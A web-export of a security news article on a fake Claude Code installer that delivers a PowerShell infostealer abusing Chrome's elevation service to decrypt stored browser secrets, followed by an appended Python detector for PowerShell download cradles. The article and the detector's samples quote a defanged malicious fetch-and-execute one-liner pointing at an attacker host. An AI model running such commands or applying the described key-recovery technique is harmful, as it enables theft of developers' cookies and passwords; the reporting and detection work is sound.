{"id":8115,"date":"2026-05-12T11:32:37","date_gmt":"2026-05-12T11:32:37","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=8115"},"modified":"2026-05-12T11:32:37","modified_gmt":"2026-05-12T11:32:37","slug":"fake-claude-code-takes-the-ielevator-to-your-browser-secrets","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=8115","title":{"rendered":"Fake Claude Code takes the IElevator to your browser secrets"},"content":{"rendered":"<div>\n<div class=\"grid grid--cols-10@md grid--cols-8@lg article-column\">\n<div class=\"col-12 col-10@md col-6@lg col-start-3@lg\">\n<div class=\"article-column__content\">\n<div class=\"container\"><\/div>\n<p>Developers looking for Anthropic\u2019s increasingly popular Claude Code tool are now being lured into downloading malware.<\/p>\n<p>According to researchers at Ontinue, attackers are abusing a fake Claude Code installer to deliver a previously undocumented PowerShell payload. The malware is designed to evade detection, recover browser encryption material, and steal sensitive data from developer systems.<\/p>\n<p>\u201cDevelopers hold the keys to an organization\u2019s most sensitive assets \u2013 intellectual property, cloud infrastructure, CI\/CD pipelines,\u201d said <a href=\"https:\/\/www.linkedin.com\/in\/vineetasangaraju\/\" target=\"_blank\" rel=\"noopener\">Vineeta Sangaraju<\/a>, AI Research Engineer at Black Duck. \u201cThey also, by necessity, need the freedom to download and install software. That combination makes them a high-value target.\u201d<\/p>\n<p>Ontinue researchers said that everything possibly detectable on the attack chain is wrapped within the <a href=\"https:\/\/www.csoonline.com\/article\/4006326\/how-to-log-and-monitor-powershell-activity-for-suspicious-scripts-and-commands.html\">PowerShell <\/a>loader, complicating detection. 
\u201cTwo standard API-chain rule sets we evaluated against the binary returned no matches,\u201d they said in a <a href=\"https:\/\/www.ontinue.com\/resource\/blog-behind-a-fake-claude-code-installer\/\" target=\"_blank\" rel=\"noopener\">blog post<\/a>.<\/p>\n<p>The malware has \u201cgeographic exclusion\u201d enabled: it checks the host\u2019s Windows region settings against an exclusion list of geographies, namely all the CIS member states and Iran, and aborts immediately if there is a match.<\/p>\n<h2 class=\"wp-block-heading\">Campaign replaces Claude Code\u2019s legitimate one-line setup<\/h2>\n<p>According to Ontinue, the campaign depends on fake installer pages impersonating Claude Code distribution channels. Rather than delivering Anthropic\u2019s legitimate one-line installation routine, \u201cirm https[:]\/\/claude[.]ai\/install.ps1 | iex,\u201d the pages serve an attacker-controlled command of identical shape (\u201cirm events[.]msft23[.]com | iex\u201d) in which only the host differs, and which initiates a staged payload chain.<\/p>\n<p>Once executed, the malicious routine deploys multiple components intended to establish persistence while minimizing the behavioral indicators typically associated with commodity malware loaders.<\/p>\n<p>\u201cEverything readily detected (SQLite database access, archive construction, HTTPS exfiltration, scheduled-task persistence, and the process-injection chain itself) resides exclusively within the PowerShell loader,\u201d the researchers said, adding that the native helper exposes no networking, cryptographic, or file-enumeration imports.<\/p>\n<p>The only telling sign in the native helper is a single indirect COM vtable invocation, they noted.<\/p>\n<p>The stages Ontinue enumerated are geographic exclusion, ID collection, browser enumeration, v10\/v20 key handling (the DPAPI-protected and app-bound encryption schemes Chrome uses for stored secrets), PowerShell architecture matching and launch, decryption and collection, exfiltration, and persistence, all carried out while the loader stays out of sight of conventional scanners.<\/p>\n<p>\u201cSwapping a legitimate installer for a malicious one is not 
a new attack,\u201d Sangaraju pointed out. \u201cHowever, what makes this ongoing campaign notable is the precision with which it was built to evade the detection methods that most security teams rely on today. The malicious activity is deliberately structured to look benign to scanners.\u201d<\/p>\n<h2 class=\"wp-block-heading\">Chrome\u2019s elevation service was abused to recover ABE keys<\/h2>\n<p>The researchers also described the malware abusing Chrome\u2019s Elevation Service to recover the key material behind Application-Bound Encryption (ABE). Rather than attacking the encryption itself, the payload invokes the IElevator2 COM interface that the service exposes and has the service decrypt the ABE key on its behalf.<\/p>\n<p>That gave the attackers access to browser-protected data that is meant to be out of reach of infostealers. Google introduced ABE in Chrome 127 in July 2024 specifically to stop commodity stealers from lifting cookies and saved passwords straight out of the profile\u2019s SQLite databases: instead of protecting the key only with the user\u2019s DPAPI key, which any process running as that user can unwrap, Chrome hands it to a SYSTEM-level service that is supposed to decrypt it only for Chrome. An infostealer that can get that service to decrypt for it, as this one does, is back where it was before ABE.<\/p>\n<p>Ontinue stopped short of making firm attribution claims as it found no match with published TTPs associated with popular families like <a href=\"https:\/\/www.csoonline.com\/article\/4032035\/ransomware-up-179-credential-theft-up-800-2025s-cyber-onslaught-intensifies.html\">Lumma<\/a>, StealC, Vidar, EDDIESTEALER, Katz, <a href=\"https:\/\/www.csoonline.com\/article\/4148601\/chrome-abe-bypass-discovered-new-voidstealer-malware-steals-passwords-and-cookies.html\">VoidStealer<\/a>, Storm, and XenoStealer, among others. 
The closest the researchers got to a match was with Glove Stealer, which also abuses IElevator, but they rejected a direct attribution, citing six points on which the two differ.<\/p>\n<p>A YARA <a href=\"https:\/\/github.com\/ontinue-research\/threat-intel-iocs\/blob\/main\/Public\/powershell_infostealer\/mt7263_abe_helper.yar\" target=\"_blank\" rel=\"noopener\">ruleset<\/a> and a set of indicators of compromise (<a href=\"https:\/\/github.com\/ontinue-research\/threat-intel-iocs\/blob\/main\/Public\/powershell_infostealer\/mt7263_iocs.md\" target=\"_blank\" rel=\"noopener\">IOCs<\/a>) were shared through GitHub repositories to support detection, and the researchers recommended a set of best practices alongside them: enforcing PowerShell Constrained Language Mode, requiring phishing-resistant MFA, enabling and verifying AMSI tamper protection, and blocking newly registered domains. Constrained Language Mode is worth singling out: it denies scripts the Add-Type, arbitrary .NET and COM invocations that a loader like this one depends on, but it only holds if it is enforced through a WDAC or AppLocker policy, since a language mode set inside a session is gone as soon as a fresh PowerShell process is launched.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>Developers looking for Anthropic\u2019s increasingly popular Claude Code tool are now being lured into downloading malware. According to researchers at Ontinue, attackers are abusing a fake Claude Code installer to deliver a previously undocumented PowerShell payload. The malware is designed to evade detection, recover browser encryption material, and steal sensitive data from developer systems. 
\u201cDevelopers [&hellip;]<\/p>\n","protected":false},"author":0,"featured_media":8116,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-8115","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/8115"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8115"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/8115\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/8116"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8115"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8115"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8115"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
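The legitimate and malicious one-liners in the article differ only in the host they fetch from, and the mitigation list at the end leans on catching exactly that kind of download cradle. The following is an added example, not code from the article or from Ontinue, of detection logic a SOC could run over PowerShell script block log text (the ScriptBlockText of event ID 4104, exported from Get-WinEvent or a SIEM): it refangs any defanged indicators, extracts the hosts a cradle fetches from, and classifies each block as an IOC hit, an unapproved cradle, a vendor-approved installer, or no cradle at all. The sample script blocks are constructed for the example; claude.ai and events[.]msft23[.]com come from the article, while the allow-list, the verdict names and all function names are this example's own choices.

```python
"""Classify PowerShell script blocks by download-cradle shape and fetched host.

Added example for the article above; not Ontinue's tooling. Input is the
ScriptBlockText of PowerShell event ID 4104 records (or any script text).
"""
import re
from dataclasses import dataclass

# Hosts from which a vendor-published "paste this one-liner" installer is
# expected. claude.ai is named in the article; the set itself is an assumption.
INSTALL_HOST_ALLOWLIST = {"claude.ai"}

# Attacker host from the article's IOCs, kept defanged in source and refanged
# at load time so that it compares equal to what appears in real logs.
IOC_HOSTS_DEFANGED = {"events[.]msft23[.]com"}

# Fetch primitives (irm/iwr are built-in aliases; curl/wget are aliases in
# Windows PowerShell 5.1) and the evaluators a cradle feeds them into.
FETCH = r"(?:\b(?:irm|iwr|curl|wget|invoke-restmethod|invoke-webrequest)\b|net\.webclient)"
EVAL = r"\b(?:iex|invoke-expression)\b"
# Either "fetch ... | iex" or "iex ( ... fetch ... )".
CRADLE_RE = re.compile(rf"{FETCH}.*?\|\s*{EVAL}|{EVAL}.*?{FETCH}", re.I | re.S)
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)
# irm/iwr accept a bare host ("irm events.msft23.com"); capture that form too.
BARE_HOST_RE = re.compile(
    r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\s+['\"]?"
    r"([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)


def refang(text: str) -> str:
    """Undo the usual defanging ([.] [:] hxxp) so indicators match log text."""
    text = re.sub(r"hxxp", "http", text, flags=re.I)
    return text.replace("[.]", ".").replace("[:]", ":")


IOC_HOSTS = {refang(h) for h in IOC_HOSTS_DEFANGED}


@dataclass(frozen=True)
class Finding:
    verdict: str            # ioc_match | unapproved_cradle | approved_installer | no_cradle
    cradle: bool            # fetch-and-evaluate pattern present
    hosts: tuple[str, ...]  # hosts the block fetches from, where recoverable


def analyze_script_block(script_text: str) -> Finding:
    text = refang(script_text)
    hosts = {h.lower() for h in URL_HOST_RE.findall(text)}
    hosts |= {h.lower() for h in BARE_HOST_RE.findall(text)}
    cradle = CRADLE_RE.search(text) is not None
    if hosts & IOC_HOSTS:
        verdict = "ioc_match"
    elif cradle and hosts and hosts <= INSTALL_HOST_ALLOWLIST:
        verdict = "approved_installer"
    elif cradle:
        # Covers cradles whose URL is assembled at run time, so no host is
        # visible in the text; treat those as unapproved rather than unknown.
        verdict = "unapproved_cradle"
    else:
        verdict = "no_cradle"
    return Finding(verdict, cradle, tuple(sorted(hosts)))


# Constructed sample script blocks (not real log data). The malicious host is
# defanged here and refanged inside analyze_script_block.
SAMPLE_SCRIPT_BLOCKS = [
    "irm https://claude.ai/install.ps1 | iex",
    "irm events[.]msft23[.]com | iex",
    "iex (New-Object Net.WebClient).DownloadString('https://cdn.example.net/setup.ps1')",
    "Invoke-WebRequest https://claude.ai/install.ps1 -OutFile install.ps1",
    "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }",
    "$u = 'https://' + $d + '/stage2'; irm $u | iex",
]


def analyze_many(blocks):
    """Classify a list of script blocks in order."""
    return [analyze_script_block(b) for b in blocks]


if __name__ == "__main__":
    for block, f in zip(SAMPLE_SCRIPT_BLOCKS, analyze_many(SAMPLE_SCRIPT_BLOCKS)):
        hosts = ",".join(f.hosts) or "-"
        print(f"{f.verdict:18} hosts={hosts:24} {block}")
```

Encoded commands (-EncodedCommand) and cradles split across several script blocks are out of scope here; the 4104 event for the decoded or reassembled script is what this should be run over. The allow-list check is deliberately strict (every host in the block must be approved), so a block that fetches from claude.ai and a second host is still flagged.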